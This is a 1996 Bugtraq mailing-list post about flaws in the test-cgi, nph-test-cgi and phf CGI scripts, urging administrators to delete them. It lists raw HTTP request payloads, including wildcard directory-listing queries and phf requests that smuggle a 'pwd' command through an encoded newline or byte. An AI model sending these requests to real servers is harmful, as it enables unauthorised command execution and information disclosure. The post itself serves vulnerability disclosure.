[nph]test-cgi
daemon@ATHENA.MIT.EDU (*Hobbit*)
Fri Dec 13 14:45:11 1996
Date: Fri, 13 Dec 1996 00:36:00 CST
Reply-To: hobbit@avian.org
From: *Hobbit* <hobbit@avian.org>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
Interesting how many people are suddenly coming out of the woodwork as
though test-cgi was a new problem.
With minor variants, both scripts are a problem in a couple of areas. Crank
each of these plus a couple of newlines into your server and see what you get:
GET /cgi-bin/test-cgi?* HTTP/1.0
GET /cgi-bin/test-cgi?x *
GET /cgi-bin/nph-test-cgi?* HTTP/1.0
GET /cgi-bin/nph-test-cgi?x *
not to mention
GET /cgi-bin/phf?Q=x%0apwd
GET /cgi-bin/phf?Q=x%ffpwd
then NUKE everything in that cgi-bin dir and replace what you need with
well-written standalone PROGRAMS that start by mistrusting their environment.
_H*